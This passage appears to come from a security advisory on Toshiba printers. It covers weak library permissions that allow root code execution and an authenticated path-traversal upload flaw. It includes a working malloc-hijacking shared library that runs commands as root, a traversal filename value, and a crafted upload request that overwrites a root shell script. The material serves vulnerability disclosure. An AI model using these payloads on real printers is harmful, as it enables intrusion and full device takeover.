\/>2023\/05\/27 11:31:47 CMD: UID=0 PID=4148 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:48 CMD: UID=0 PID=4156 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:48 CMD: UID=0 PID=4155 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:48 CMD: UID=0 PID=4154 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:48 CMD: UID=0 PID=4153 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:48 CMD: UID=0 PID=4152 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:48 CMD: UID=0 PID=4158 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<\/p>\n<p>We can analyze a newly-created Apache process. For example, the Apache<br \/>process with the PID 4129 will have some libraries loaded in order to<br \/>execute code implemented in these libraries:<\/p>\n<p>bash-4.1# cat \/proc\/4129\/maps<br \/>08048000-080bb000 r-xp 00000000 08:02 155908<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/httpd<br \/>080bb000-080bf000 rw-p 00072000 08:02 155908<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/httpd<br \/>080bf000-0833e000 rw-p 00000000 00:00 0 [heap]0833e000-08360000 rw-p 00000000 00:00 0 [heap]08360000-083e8000 rw-p 00000000 00:00 0 [heap]4bc47000-4bc63000 r-xp 00000000 08:02 11770 \/lib\/ld-2.11.3.so<br \/>4bc63000-4bc64000 r&#8211;p 0001b000 08:02 11770 \/lib\/ld-2.11.3.so<br \/>4bc64000-4bc65000 rw-p 0001c000 08:02 11770 \/lib\/ld-2.11.3.so<br \/>4bc67000-4bda6000 r-xp 00000000 08:02 11750 \/lib\/libc-2.11.3.so<br \/>4bda6000-4bda7000 &#8212;p 0013f000 08:02 11750 \/lib\/libc-2.11.3.so<br \/>4bda7000-4bda9000 r&#8211;p 0013f000 08:02 11750 \/lib\/libc-2.11.3.so<br \/>4bda9000-4bdaa000 rw-p 00141000 08:02 11750 \/lib\/libc-2.11.3.so<br \/>4bdaa000-4bdad000 rw-p 00000000 00:00 0<br \/>4bdaf000-4bdb1000 r-xp 00000000 08:02 11665 \/lib\/libdl-2.11.3.so<br \/>4bdb1000-4bdb2000 r&#8211;p 00001000 08:02 11665 \/lib\/libdl-2.11.3.so<br \/>4bdb2000-4bdb3000 rw-p 00002000 08:02 11665 \/lib\/libdl-2.11.3.so<br \/>4bdbf000-4bddf000 r-xp 00000000 08:02 139743 \/usr\/lib\/libpcre.so.3.12.1<br \/>4bddf000-4bde0000 rw-p 0001f000 08:02 139743 \/usr\/lib\/libpcre.so.3.12.1<br \/>4bdee000-4bdf0000 r-xp 00000000 08:02 144969 \/usr\/lib\/libcom_err.so.2.1<br \/>4bdf0000-4bdf1000 rw-p 00001000 08:02 144969 \/usr\/lib\/libcom_err.so.2.1<br \/>4bdfa000-4be0c000 r-xp 00000000 08:02 145525 \/usr\/lib\/libz.so.1.2.3<br \/>4be0c000-4be0d000 rw-p 00011000 08:02 145525 \/usr\/lib\/libz.so.1.2.3<br \/>4be0f000-4be12000 r-xp 00000000 08:02 144902 \/usr\/lib\/libuuid.so.1.3.0<br \/>4be12000-4be13000 rw-p 00002000 08:02 144902 \/usr\/lib\/libuuid.so.1.3.0<br \/>4be15000-4be1c000 r-xp 00000000 08:02 11732 \/lib\/librt-2.11.3.so<br \/>4be1c000-4be1d000 r&#8211;p 00006000 08:02 11732 \/lib\/librt-2.11.3.so<br \/>4be1d000-4be1e000 rw-p 00007000 08:02 11732 \/lib\/librt-2.11.3.so<br \/>4be7e000-4be9f000 r-xp 00000000 08:02 142900 \/usr\/lib\/libk5crypto.so.3.1<br \/>4be9f000-4bea0000 rw-p 00021000 08:02 142900 \/usr\/lib\/libk5crypto.so.3.1<br \/>4bea7000-4bead000 r-xp 00000000 08:02 140031<br \/>\/usr\/lib\/libkrb5support.so.0.1<br \/>4bead000-4beae000 rw-p 00005000 08:02 140031<br \/>\/usr\/lib\/libkrb5support.so.0.1<br \/>4c04f000-4c133000 r-xp 00000000 08:02 145085<br \/>\/usr\/lib\/libstdc++.so.6.0.13<br \/>4c133000-4c137000 r&#8211;p 000e4000 08:02 145085<br \/>\/usr\/lib\/libstdc++.so.6.0.13<br \/>4c137000-4c138000 rw-p 000e8000 08:02 145085<br \/>\/usr\/lib\/libstdc++.so.6.0.13<br \/>&#8230;<br \/>710a3000-710a5000 r-xp 00000000 08:02 153564<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_authn_file.so<br \/>710a5000-710a6000 rw-p 00001000 08:02 153564<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_authn_file.so<br \/>710a6000-710a9000 r-xp 00000000 08:02 154158<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_authn_core.so<br \/>710a9000-710aa000 rw-p 00002000 08:02 154158<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_authn_core.so<br \/>710aa000-710b4000 r-xp 00000000 08:02 154478<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_dav_fs.so<br \/>710b4000-710b5000 rw-p 00009000 08:02 154478<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_dav_fs.so<br \/>&#8230;<br \/>75674000-75677000 r&#8211;p 00064000 08:02 153751<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libssl.so.1.0.0<br \/>75677000-7567b000 rw-p 00067000 08:02 153751<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libssl.so.1.0.0<br \/>7567b000-756b0000 r-xp 00000000 08:02 154613<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libldap-2.4.so.2.5.6<br \/>756b0000-756b3000 rw-p 00034000 08:02 154613<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libldap-2.4.so.2.5.6<br \/>756b3000-756bd000 r-xp 00000000 08:02 11632 \/lib\/libpam.so.0.82.2<br \/>756bd000-756be000 rw-p 0000a000 08:02 11632 \/lib\/libpam.so.0.82.2<br \/>756be000-76217000 r-xp 00000000 08:02 21362<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libssdk.so.0.0.0<br \/>76217000-76258000 rw-p 00b58000 08:02 21362<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libssdk.so.0.0.0<br \/>76258000-7625f000 rw-p 00000000 00:00 0<br \/>7625f000-7626a000 r-xp 00000000 08:02 20801<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so.0<br \/>7626a000-7626b000 rw-p 0000a000 08:02 20801<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so.0<br \/>7626b000-76273000 r-xp 00000000 08:02 20878<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/mod_efiwebserver.so.0<br \/>76273000-76274000 rw-p 00007000 08:02 20878<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/mod_efiwebserver.so.0<br \/>76274000-76275000 &#8212;p 00000000 00:00 0<br \/>76275000-76a74000 rwxp 00000000 00:00 0<br \/>76a74000-76a77000 rw-p 00000000 00:00 0<br \/>76a77000-76a7b000 r-xp 00000000 08:02 11633 \/lib\/libattr.so.1.1.0<br \/>76a7b000-76a7c000 rw-p 00003000 08:02 11633 \/lib\/libattr.so.1.1.0<br \/>76a7c000-76a82000 r-xp 00000000 08:02 11721 \/lib\/libacl.so.1.1.0<br \/>76a82000-76a83000 rw-p 00005000 08:02 11721 \/lib\/libacl.so.1.1.0<br \/>76a83000-76a84000 rw-p 00000000 00:00 0<br \/>76a84000-76af3000 r-xp 00000000 08:02 21782<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcios.so.0<br \/>76af3000-76af7000 rw-p 0006f000 08:02 21782<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcios.so.0<br \/>76af7000-76b50000 r-xp 00000000 08:02 145519 \/usr\/lib\/libintlc.so.5<br \/>76b50000-76b53000 rw-p 00059000 08:02 145519 \/usr\/lib\/libintlc.so.5<br \/>76b53000-76b5c000 r-xp 00000000 08:02 11622 \/lib\/libcrypt-2.11.3.so<br \/>76b5c000-76b5d000 r&#8211;p 00008000 08:02 11622 \/lib\/libcrypt-2.11.3.so<br \/>76b5d000-76b5e000 rw-p 00009000 08:02 11622 \/lib\/libcrypt-2.11.3.so<br \/>76b5e000-76b85000 rw-p 00000000 00:00 0<br \/>76b85000-76b97000 r-xp 00000000 08:02 154448<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libroken.so.18.1.0<br \/>76b97000-76b98000 rw-p 00012000 08:02 154448<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libroken.so.18.1.0<br \/>76b98000-76b99000 rw-p 00000000 00:00 0<br \/>76b99000-76b9c000 r-xp 00000000 08:02 154186<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libcom_err.so.1.1.3<br \/>76b9c000-76b9d000 rw-p 00002000 08:02 154186<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libcom_err.so.1.1.3<br \/>76b9d000-76bc4000 r-xp 00000000 08:02 154600<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libwind.so.0.0.0<br \/>76bc4000-76bc5000 rw-p 00027000 08:02 154600<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libwind.so.0.0.0<br \/>76bc5000-76c64000 r-xp 00000000 08:02 154326<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libasn1.so.8.0.0<br \/>76c64000-76c67000 rw-p 0009f000 08:02 154326<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libasn1.so.8.0.0<br \/>76c67000-76c96000 r-xp 00000000 08:02 153499<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhcrypto.so.4.1.0<br \/>76c96000-76c99000 rw-p 0002e000 08:02 153499<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhcrypto.so.4.1.0<br \/>76c99000-76c9a000 rw-p 00000000 00:00 0<br \/>76c9a000-76d0b000 r-xp 00000000 08:02 153648<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libheimsqlite.so.0.0.0<br \/>76d0b000-76d0d000 rw-p 00070000 08:02 153648<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libheimsqlite.so.0.0.0<br \/>76d0d000-76d0e000 rw-p 00000000 00:00 0<br \/>76d0e000-76d4d000 r-xp 00000000 08:02 154400<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhx509.so.5.0.0<br \/>76d4d000-76d4f000 rw-p 0003f000 08:02 154400<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhx509.so.5.0.0<br \/>76d4f000-76d55000 r-xp 00000000 08:02 145615 \/usr\/lib\/libirng.so<br \/>76d55000-76d58000 rw-p 00005000 08:02 145615 \/usr\/lib\/libirng.so<br \/>76d58000-76d6b000 r-xp 00000000 08:02 21737<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libllmnrclient.so.0<br \/>76d6b000-76d6c000 rw-p 00012000 08:02 21737<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libllmnrclient.so.0<br \/>76d6c000-77568000 r-xp 00000000 08:02 157246 \/mfp\/lib\/libsvml.so<br \/>77568000-77586000 rw-p 007fc000 08:02 157246 \/mfp\/lib\/libsvml.so<br \/>77586000-77587000 rw-p 00000000 00:00 0<br \/>77587000-775ad000 r-xp 00000000 08:02 11746 \/lib\/libm-2.11.3.so<br \/>775ad000-775ae000 r&#8211;p 00025000 08:02 11746 \/lib\/libm-2.11.3.so<br \/>775ae000-775af000 rw-p 00026000 08:02 11746 \/lib\/libm-2.11.3.so<br \/>775af000-77624000 r-xp 00000000 08:02 145632<br \/>\/usr\/lib\/libsqlite3.so.0.8.6<br \/>77624000-77626000 rw-p 00074000 08:02 145632<br \/>\/usr\/lib\/libsqlite3.so.0.8.6<br \/>77626000-77627000 rw-p 00000000 00:00 0<br \/>77627000-77695000 r-xp 00000000 08:02 154620<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libkrb5.so.25.0.0<br \/>77695000-77698000 rw-p 0006e000 08:02 154620<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libkrb5.so.25.0.0<br \/>77698000-776ad000 r-xp 00000000 08:02 11629 \/lib\/libpthread-2.11.3.so<br \/>776ad000-776ae000 r&#8211;p 00014000 08:02 11629 \/lib\/libpthread-2.11.3.so<br \/>776ae000-776af000 rw-p 00015000 08:02 11629 \/lib\/libpthread-2.11.3.so<br \/>776af000-776b2000 rw-p 00000000 00:00 0<br \/>776b2000-776db000 r-xp 00000000 08:02 153455<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libapr-1.so.0.7.0<br \/>776db000-776dd000 rw-p 00028000 08:02 153455<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libapr-1.so.0.7.0<br \/>776dd000-776fb000 r-xp 00000000 08:02 154622<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libaprutil-1.so.0.6.1<br \/>776fb000-776fd000 rw-p 0001e000 08:02 154622<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libaprutil-1.so.0.6.1<br \/>776fd000-776fe000 rw-p 00000000 00:00 0<br \/>776fe000-77702000 r-xp 00000000 08:02 154313<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_headers.so<br \/>77702000-77703000 rw-p 00003000 08:02 154313<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_headers.so<br \/>77703000-77712000 r-xp 00000000 00:0d 10594<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>77712000-77714000 rw-p 0000e000 00:0d 10594<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>77714000-77715000 rw-p 00000000 00:00 0<br \/>77715000-77720000 r-xp 00000000 00:0d 11406<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>77720000-77722000 rw-p 0000a000 00:0d 11406<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<\/p>\n<p>Because of weak permissions, we can overwrite hundreds of libraries to<br \/>get Remote Code Execution.<\/p>\n<p>We can overwrite the 2 libraries that will be loaded by default by the<br \/>programs running inside the printers:<\/p>\n<p>&#8211; &#8211; `\/ramdisk\/al\/libGetAddtInfoInterface.so`<br \/>&#8211; &#8211; `\/ramdisk\/al\/libGetNameInfoInterface.so`<\/p>\n<p>These 2 libraries export Intel-optimized functions.<\/p>\n<p>Exported functions found in the LD_PRELOAD&#8217;ed libraries:<\/p>\n<p>kali% nm -D<br \/>\/home\/user\/research\/printers\/topaccess\/4.50-latest-version\/4.50-new-version\/extract\/home\/SYSROM_SRC\/build\/release\/lib\/libGetNameInfoInterface.so.0<br \/>0000cf40 A __bss_start<br \/>00009150 T __cacheSize<br \/>w __cxa_finalize@GLIBC_2.1.3<br \/>U dlsym@GLIBC_2.0<br \/>0000cf40 A _edata<br \/>0000cfc0 A _end<br \/>00009d04 T _fini<br \/>00002340 T getnameinfo<br \/>00002290 T getNameInfoWrapper<br \/>w __gmon_start__<br \/>00002088 T _init<br \/>00009cb0 T __intel_f2int<br \/>00002530 T _intel_fast_memcpy<br \/>00002440 T _intel_fast_memcpy.A<br \/>00002500 T _intel_fast_memcpy.H<br \/>00002470 T _intel_fast_memcpy.J<br \/>000024a0 T _intel_fast_memcpy.M<br \/>000024d0 T _intel_fast_memcpy.P<br \/>000026f0 T _intel_fast_memset<br \/>00002600 T _intel_fast_memset.A<br \/>00002660 T _intel_fast_memset.H<br \/>00002630 T _intel_fast_memset.J<br \/>00002690 T _intel_fast_memset.M<br \/>000026c0 T _intel_fast_memset.P<br \/>000027cc T __intel_memcpy<br \/>000033fd T __intel_memset<br \/>000027c0 T __intel_new_memcpy<br \/>00003b10 T __intel_new_memcpy_P3<br \/>000033f0 T __intel_new_memset<br \/>00004a90 T __intel_new_memset_P3<br \/>000051e0 T __intel_sse2_memset<br \/>00005850 T __intel_sse2_rep_memset<br \/>00005dd0 T __intel_ssse3_memcpy<br \/>00007dc0 T __intel_ssse3_rep_memcpy<br \/>w _Jv_RegisterClasses<br \/>U memcpy@GLIBC_2.0<br \/>U memset@GLIBC_2.0<br \/>U pthread_create@GLIBC_2.1<br \/>U pthread_join@GLIBC_2.0<br \/>kali% nm -D<br \/>\/home\/user\/research\/printers\/topaccess\/4.50-latest-version\/4.50-new-version\/extract\/home\/SYSROM_SRC\/build\/release\/lib\/libGetNameInfoInterface.so.0<br \/>0000cf40 A __bss_start<br \/>00009150 T __cacheSize<br \/>w __cxa_finalize@GLIBC_2.1.3<br \/>U dlsym@GLIBC_2.0<br \/>0000cf40 A _edata<br \/>0000cfc0 A _end<br \/>00009d04 T _fini<br \/>00002340 T getnameinfo<br \/>00002290 T getNameInfoWrapper<br \/>w __gmon_start__<br \/>00002088 T _init<br \/>00009cb0 T __intel_f2int<br \/>00002530 T _intel_fast_memcpy<br \/>00002440 T _intel_fast_memcpy.A<br \/>00002500 T _intel_fast_memcpy.H<br \/>00002470 T _intel_fast_memcpy.J<br \/>000024a0 T _intel_fast_memcpy.M<br \/>000024d0 T _intel_fast_memcpy.P<br \/>000026f0 T _intel_fast_memset<br \/>00002600 T _intel_fast_memset.A<br \/>00002660 T _intel_fast_memset.H<br \/>00002630 T _intel_fast_memset.J<br \/>00002690 T _intel_fast_memset.M<br \/>000026c0 T _intel_fast_memset.P<br \/>000027cc T __intel_memcpy<br \/>000033fd T __intel_memset<br \/>000027c0 T __intel_new_memcpy<br \/>00003b10 T __intel_new_memcpy_P3<br \/>000033f0 T __intel_new_memset<br \/>00004a90 T __intel_new_memset_P3<br \/>000051e0 T __intel_sse2_memset<br \/>00005850 T __intel_sse2_rep_memset<br \/>00005dd0 T __intel_ssse3_memcpy<br \/>00007dc0 T __intel_ssse3_rep_memcpy<br \/>w _Jv_RegisterClasses<br \/>U memcpy@GLIBC_2.0<br \/>U memset@GLIBC_2.0<br \/>U pthread_create@GLIBC_2.1<br \/>U pthread_join@GLIBC_2.0<br \/>kali%<\/p>\n<p>An attacker can create a new library and export a function that will<br \/>be used by any program, for example `malloc()`.<\/p>\n<p>A custom library has been written, hijacking the control flow of the<br \/>`malloc()` function:<\/p>\n<p>kali% cat Makefile<br \/>all:<br \/>rm \/home\/user\/research\/printers\/topaccess\/malloc\/malloc.so<br \/>gcc -o malloc.so -m32 -shared -fPIC malloc.c<\/p>\n<p>kali% cat malloc.c<br \/>#include &lt;stdio.h&gt;<br \/>#include &lt;unistd.h&gt;<br \/>#include &lt;stdlib.h&gt;<br \/>#include &lt;dlfcn.h&gt;<\/p>\n<p>void *malloc(size_t size)<br \/>{<br \/>static void *(*fptr)(size_t) = NULL;<\/p>\n<p>if (fptr == NULL)<br \/>{<br \/>fptr = (void *(*)(size_t))dlsym(RTLD_NEXT, &#8220;malloc&#8221;);<br \/>if (fptr == NULL)<br \/>{<br \/>printf(&#8220;dlsym: %s\\n&#8221;, dlerror());<br \/>return NULL;<br \/>}<br \/>}<\/p>\n<p>system(&#8220;LD_PRELOAD=&#8221; id &gt; \/dev\/shm\/id&#8221;);<\/p>\n<p>return (*fptr)(size);<br \/>}<br \/>kali% make<br \/>rm \/home\/user\/research\/printers\/topaccess\/malloc\/malloc.so<br \/>gcc -o malloc.so -m32 -shared -fPIC malloc.c<br \/>kali% ls -la<br \/>total 32<br \/>drwx&#8212;&#8212; 2 user user 4096 May 13 11:04 .<br \/>drwx&#8212;&#8212; 4 user user 4096 May 13 11:02 ..<br \/>-rw&#8212;&#8212;- 1 user user 112 May 13 11:04 Makefile<br \/>-rw&#8212;&#8212;- 1 user user 398 May 13 11:03 malloc.c<br \/>-rwx&#8212;&#8212; 1 user user 14696 May 13 11:04 malloc.so<br \/>kali%<\/p>\n<p>When uploading this library as<br \/>`\/ramdisk\/al\/libGetAddtInfoInterface.so` or<br \/>`\/ramdisk\/al\/libGetNameInfoInterface.so`, the `malloc()` function will<br \/>be executed by some programs running inside the printers and the id<br \/>command will be executed as root (the output will be written into<br \/>`\/dev\/shm\/id`).<\/p>\n<p>A side effect it that a lot of programs will also crash. The execution<br \/>of the malicious payload will still work.<\/p>\n<p>By targeting only specific functions used by Apache or specific<br \/>programs inside the printer, it is possible to avoid crashing the<br \/>programs.<\/p>\n<p>### Other ways to get Remote Code Execution<\/p>\n<p>An attacker can use the other vulnerabilities to get Remote Code Execution:<\/p>\n<p>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using insecure PATH<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using<br \/>insecure LD_PRELOAD<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using<br \/>insecure LD_LIBRARY_PATH<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using<br \/>insecure permissions for 106 programs<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using CISSM<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>An attacker can overwrite any insecure files (including programs<br \/>running as root and Python code).<\/p>\n<p>## Details &#8211; Multiple Post-authenticated Remote Code Executions as root<\/p>\n<p>Toshiba printers provide several ways to upload files using the admin<br \/>web interface.<\/p>\n<p>The vulnerability in this chapter is similar to Pre-authenticated<br \/>Remote Code Execution as root or apache and multiple Local Privilege<br \/>Escalations but requires authentication on the TopAccess interface.<\/p>\n<p>When an administrator is authenticated, it is possible to upload<br \/>documents within the web interface using the maintenance interface:<\/p>\n<p>&#8211; &#8211; Upload of drivers files;<br \/>&#8211; &#8211; Upload of MAC PPD Files;<br \/>&#8211; &#8211; Upload of Unix Filters;<br \/>&#8211; &#8211; Upload of Driver packages;<br \/>&#8211; &#8211; Upload of address book, mailboxes and templates;<br \/>&#8211; &#8211; Upload of SSL certificates;<br \/>&#8211; &#8211; &#8230;<\/p>\n<p>Several webpages with an upload forms can be found in the admin interface:<\/p>\n<p>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/UnixList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/UploadList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/xmlformat\/XmlFormatList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/MacList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/import\/ImportListFrame.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Languages\/InstallLanguagesUpload.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/AdminRegistration\/ImageIconManagementFrame.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Cloning\/CloneFileUpload.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/DriverCustomize.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/MacList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/PointAndPrintList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/UnixList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/UploadList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/xmlformat\/XmlFormatList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/import\/ImportListFrame.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/backup\/BackupList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Security\/Certificates\/CertUpload.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/MetaScan\/XMLFormatFile\/XmlFormatList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Setup\/setting\/DDNSUpload.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Setup\/ServerConnErrRegFileUpload.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Setup\/PDLUpload.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Setup\/ICCProfile\/ImportICCProfile.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/SystemUpdates\/nSystemUpdatesUpload.html<\/p>\n<p>All these upload functionalities are vulnerable: they allow an<br \/>attacker with admin privilege to overwrite any file present in the<br \/>printers.<\/p>\n<p>The vulnerability likely resides in the<br \/>`\/home\/SYSROM_SRC\/build\/release\/lib\/mod_contentwebserver.so.0`<br \/>library, where the `\/contentwebserver\/upload` API is implemented.<br \/>Consequently, this is a unique vulnerability that is reachable by<br \/>using different upload forms.<\/p>\n<p>For example, we can see 3 different types of upload forms:<\/p>\n<p>Upload of Driver files<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>Upload of Unix filters<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>Upload of address book, mailboxes and templates<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>All of these forms are vulnerable by crafting a malicious `name` value<br \/>as shown in the next screenshot. It is possible to change the HTTP<br \/>request by modifying the name value to rewrite any file in the<br \/>printer.<\/p>\n<p>For example, it is possible to overwrite the<br \/>`\/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver` shell<br \/>script by sending a malicious file using the name value<br \/>`\/.\/..\/..\/..\/..\/..\/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver`:<\/p>\n<p>Upload of malicious ldapserver shell script:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>It is necessary to update the cookie and the CsrfpId values:<\/p>\n<p>POST \/contentwebserver\/upload HTTP\/1.1<br \/>Host: 10.0.0.1:8081<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0)<br \/>Gecko\/20100101 Firefox\/102.0<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Content-Type: multipart\/form-data;<br \/>boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;136357212815291094282690264320<br \/>Content-Length: 1056<br \/>Origin: http:\/\/10.0.0.1:8081<br \/>Connection: close<br \/>Referer: http:\/\/10.0.0.1:8081\/Administration\/maintenance\/uploadsoft\/DriverCustomize.html?v=1670278837ta&amp;fileMode=3<br \/>Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DADMIN%26SUB%3DMAINT%26CAT%3DUPSW;<br \/>IgnoreSessionTimeout=1;<br \/>Session=10.0.0.2.3dfcc68624ce6c49d245e33f704a92b3; clicked=0;<br \/>addrLastVisited=FAVGRP<br \/>Upgrade-Insecure-Requests: 1<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;136357212815291094282690264320<br \/>Content-Disposition: form-data; name=&#8221;formSubmitCompleteEventHandler&#8221;<\/p>\n<p>frames[0].formSubmitCompleteUploadList<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;136357212815291094282690264320<br \/>Content-Disposition: form-data; name=&#8221;DeviceInformationModel&#8221;<\/p>\n<p>&lt;DeviceInformationModel&gt;&lt;Command&gt;&lt;Move&gt;&lt;commandNode&gt;FileStorages&lt;\/commandNode&gt;&lt;Params&gt;&lt;source&gt;&lt;File&gt;script.zip&lt;\/File&gt;&lt;name&gt;Upload&lt;\/name&gt;&lt;\/source&gt;&lt;destination&gt;&lt;name&gt;PDPlugin&lt;\/name&gt;&lt;\/destination&gt;&lt;\/Params&gt;&lt;\/Move&gt;&lt;\/Command&gt;&lt;\/DeviceInformationModel&gt;<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;136357212815291094282690264320<br \/>Content-Disposition: form-data; name=&#8221;CsrfpId&#8221;<\/p>\n<p>10.0.0.2.3dfcc68624ce6c49d245e33f704a92b3<br 